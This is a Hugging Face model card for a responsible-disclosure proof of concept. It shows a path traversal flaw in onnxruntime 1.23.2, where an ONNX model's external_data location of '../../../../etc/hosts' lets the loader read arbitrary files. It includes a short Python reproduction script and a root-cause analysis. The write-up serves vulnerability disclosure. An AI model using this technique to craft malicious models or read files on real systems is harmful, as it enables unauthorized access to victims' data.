Hugging Face's logo

rez0
/
onnx-ort-path-traversal-poc

ONNX
security-research
Model card Files
xet
Community

ONNX ORT Path Traversal PoC

Security Research - Responsible Disclosure via huntr

Vulnerability

onnxruntime 1.23.2 (latest PyPI release) loads ONNX models with path traversal in external_data location fields without validation. The ONNX checker blocks this, but onnxruntime does NOT call the checker before loading.

Impact: Arbitrary file read on the victim's filesystem.

Reproduction 

# pip install onnxruntime==1.23.2 onnx numpy
python poc_ort_file_read.py

# Or manually:
import onnxruntime as ort
import numpy as np

# model.onnx has external_data location = "../../../../etc/hosts"
sess = ort.InferenceSession("model.onnx")  # No validation!
result = sess.run(None, {"X": np.zeros((1, 4), dtype=np.float32)})
# result[0] contains bytes from /etc/hosts reinterpreted as float32
raw = result[0].tobytes()
print(raw.decode('utf-8', errors='replace'))

Root Cause

  • onnx.checker.check_model() validates paths (blocks ../)
  • ort.InferenceSession() never calls the checker
  • ORT's GetExternalDataInfo() joins path without traversal check
  • Fix PR #26776 merged Dec 2025 but NOT in any PyPI release
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support